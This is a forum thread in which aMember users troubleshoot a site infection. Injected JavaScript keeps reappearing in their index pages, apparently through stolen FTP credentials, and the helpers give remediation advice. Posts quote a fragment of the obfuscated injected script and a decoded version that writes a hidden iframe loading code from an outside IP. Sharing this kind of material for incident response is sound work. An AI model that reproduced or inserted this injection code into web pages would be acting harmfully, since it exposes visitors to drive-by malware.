I have upgraded to 3.1 and each time I install it I get a dodgy script which is added to my index.html and index.php pages (below). I have uninstalled/reinstalled it twice now, and cleaned the other index.html pages in my other directories. my web site runs fine all night until I re-install amember 3.1. then within a few minutes the virus is back (AdvanceXPDefender tries to download a file) I have the latest AV software (symantec endpoint), and have run spybot and other top spyware apps - all show a clean system The script must be getting in somewhere when amember is installed. I have even reformatted my drive and reinstalled a fresh copy of windows - same things happens. Can anyone help? Regards Adrian This is a 'section' of the script that is written to my html and php index pages: var d=document,kol=561; function O10H485D4118216E1(H485D411821ED8){ var H485D4118226D0 = 16; return( parseInt(H485D411821ED8,H485D4118226D0));}function H485D4118236C5(H485D411823EC1){ var H485D4118246B6='';for(H485D411824EAF=0; 333835206865696768743D333032207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //-->
Ok, this does look very dodgy and potentially very dangerous. Please confirm that you downloaded the 3.1 update directly from your amember.com member area and nowhere else? All updates should come from amember.com and NOT any other domain name no matter how similar it sounds or if the website looks. If you contact me at phill@getresults.co.nz and send me an index page with the full javascript intact, I can probably decode it and find out what it's doing. If you installed the official Amember update from amember.com then it is possible that your server / hosting account may have been compromised and someone is able to get in to add extra code to your amember pages. This might be someone logging in manually or a script that has been installed on your server. At the very least I'd recommend changing your hosting cpanel / FTP passwords immediately and start checking log files to see if there are any successful logins from IP addresses that you're not using. If you find any strange IP addresses you can check search webserver log files for those IP addresses to see what files are being accessed on your server. It's really hard to say what is going on without seeing a full copy of the dodgy code, but I suggest treating this with the highest priority because of the risk your amember code / databases may have been compromised. This is *critically* important if you are using any payment systems that store credit card data in the amember database.
I've been researching this further and it may be related to the Advanced-XP-Defender trojan: It looks like it isn't exclusively an Amember problem - it's also affecting Wordpress and other scripts. See this thread: http://wordpress.org/support/topic/182061#post-779851 Particularly from: http://wordpress.org/support/topic/182061#post-786138 It looks like it may be related to FTP password security so definitely change your FTP passwords after cleaning out all the infected scripts on your site. That seems to be solving the problem for some users.
More info... I decoded the javascript and here's what it inserts into your web pages when they're run: <script>if(!myia){d.wr ite('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*37952)+'f3449\' width=593 height=64 style=\'display: none\'></IFRAME >');}v ar myia=true;</script> ** WARNING: DO NOT COPY AND PASTE THIS CODE INTO ANY OF YOUR SITES! ** So the first thing you can do is log into your control panel and block IP address 77.221.133.171. As long as the malicous javascript being inserted into your sites is exactly the same, then this should block whatever script is running at 77.221.133.171/if/go.html Also recommended is changing your FTP software. I see some discussion about the possibility that when Advanced XP Defender infects a windows computer it may compromise your FTP software which means every time you FTP to your websites your files may be reinfected.
Thanks for the responses. Yes I downloaded version 3.1 direct from my amember members page. It sat on my desktop for 2 minutes then I ftp'd it and began having more problems. I spent the evening navigating my site WITHOUT amember uploaded and all was well. As soon as I uploaded amember again (even before I configured it) I got the blasted script which ran as soon as I when to my domain URL. I deleted amember and checked my index.html pages (got serveral in various directories on my site) and sure enough - the code had been inserted. I cannot change my ftp password until Monday, but have changed everything else. I use WS_FTP Pro, but will try Quteftp on Monday just to be on the safe side. I have always found amember to be a great product, so need to resolve this. This did not begin with v3.1. I have been running 3.0.8 since it came out without problem. - This began a week or so ago, hense the reason I upgraded. I also took the security advise of amember suppoprt and deleted vunerable files from 3.08 when i first installed it. Thanks for the input
Would you please do something for me. Unzip the Amember update zip on your local computer and check the index.html file to see if the malicious code is in there. Next use your ftp software to upload it the index.html file to a test directory on your server. Then using your control panel file browser, view the index.html file and see if the malicious code is in there. If it is then that would confirm that your FTP client has been modified and is causing the problem when it uploads new files to your server.
Did that, and did not find any code change (which is good news as I quite like WS FTP pro, and don't really want to pay out more money) I then uploaded amember again. This time I deleted the recommended files in amember/plugins/payment BEFORE I uploaded. I got the script running again when I configured it, BUT (here's the thing) it only wrote to one index.html page in my password protected area. - no other problems so far (after 1 hour of navigating around) I Don't seem to be able to get the AdvancedXPDefender to run again, whereever it was hiding ?! (not that I want it to) I have tried on my main PC, my laptop, and my neighbours PC. - so far, nothing? One thing that I have noticed, (though probably nothing to do with this virus problem), is that when I log in to member.php, it opens fine, and all seems well, but there is a 'Done but with errors on the page' message on the status bar. (details read: line 209/char 9/object expected/code 0) All in all, very strange
Oh Well After about 4 hours, guess what - came back and wrote the script to all my index pages ! I have removed amember and the rest of my site index pages seem to stay as they are - gotta be something to do with php
With the help of Getsresults, the problem has been identified as a breach of my ftp by a Russian hacker. I am in the process of getting my server upgraded etc. Thanks Phill, you got results, and I am very gratefull to everyone who has helped. thanks all
You're welcome. Info for others reading this thread: * We're not yet sure how the user's FTP login details are being compromised but somehow these hackers are getting FTP username & password details. * This might be via a windows based virus / malware that infects a user's computer and grabs the details somehow - modifying common FTP software to send password details, key logging etc. Or, it might be that the windows hosting server has been compromised and some malicious scripts installed affecting some or all user accounts on that server. * However the code gets installed, there seems to be some sort of automated mechanism that monitors infected pages and if the javascript code disappears from the page (removed by the site owner) then some sort of automated script will log in via FTP and infect the files again. * Quick solution appears to be to block access to 77.221.133.198 (where the FTP logins come from) and 77.221.133.171 (where the javascript is loading code from). In fact, depending on the control panel you're using I would tend to block the whole 77.221.133.* subnet. * Changing all of your passwords is a particularly good idea - and make sure your control panel and FTP passwords are different. * If you don't have an offsite backup - do one IMMEDIATELY, including your databases. Remember if they can get in via FTP, they can delete all your web content. If your FTP login details are the same as your control panel details, they could delete your web content, databases, email, everything. * I recommend checking your FTP and webserver logs for any access to IPs in the 77.221.133.* range. If you see anything suspicious or you discover you've been affected, talk to your hosting provider immediately. I'll post more info if / when I find out more.
It looks like sites using Coppermine Gallery may be one source of the vulnerability http://forum.coppermine-gallery.net/index.php/topic,51882.0.html If you are not using the latest version direct from the coppermine gallery website, update it right away. Do NOT wait for Fantastico to release the latest update as that might take a while. Hack thread: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html Sanitization thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html This may not be the only way they are getting in.
I have now set my ftp and cp with different passwords, I have even changed my ftp client from wsftp to quteftp pro (just incase the hacker can track wsftp's use somehow) - probably good to be paranoid now. I have even installed Online-Armour firewall (not free version) http://www.tallemu.com/ Great stuff this global world, worth the odd stress now and again.
Wow getresults, you know your stuff. Are there any ways users can virus scan webspace to check safety?
Possible virus attack? Hello, My webmaster just upgraded our amember to the newest version 3.1.0 The same day our site went down. Host was able to pull it back up again, however very NEXT day, site went down again, this time the issue was that site was unable to process any php files. Weird, seeing we COULD up until installing the newest amember. We are unsure if this is associated to the virus being discussed here, but its uncanny that the site would have went down TWICE after installing amember. NOW my webmaster cannot log into the admin section of our amember, just spins and brings up a blank page. What should my webmaster be looking for? Thanks so much.
Hmmmm. It doesn't sound like it's exactly the same problem although it may be using the same exploit in something like Coppermine Gallery if it is another hack. Email me at phill@getresults.co.nz and I'll take a quick look at your site. The best advice I can give at the moment is to check your FTP and webserver logs and see if you are seeing any unauthorized FTP access or web traffic from countries you'd not expecting. Change your FTP & control panel passwords right away and make sure they're different if possible. Do not change them to any other passwords you use regularly - use temporary ones that are highly secure until you solve the problem. By highly secure I mean a mixture of upper & lowercase letters and at least 2 numbers and or characters. I saw someone else post recently that their amember admin page had gone blank - I wonder if they were running version 3.10 as well? I think it's unlikely that there's a new security flaw in 3.10 but it's worth keeping in mind while these problems are reported.
Generally not unless you have root level access of the server. You can ask your web host to do a virus / malware scan and they may be able to help with that. If you're suspicious that some of your amember files have been modified you can compare file sizes with the same files from a brand new copy of the Amember archive. Also make sure you are 100% up to date with any other scripts you are running on your web host - Coppermine Gallery is one script that has had two very nasty exploits identified recently. So check everything else with the main site for those scripts.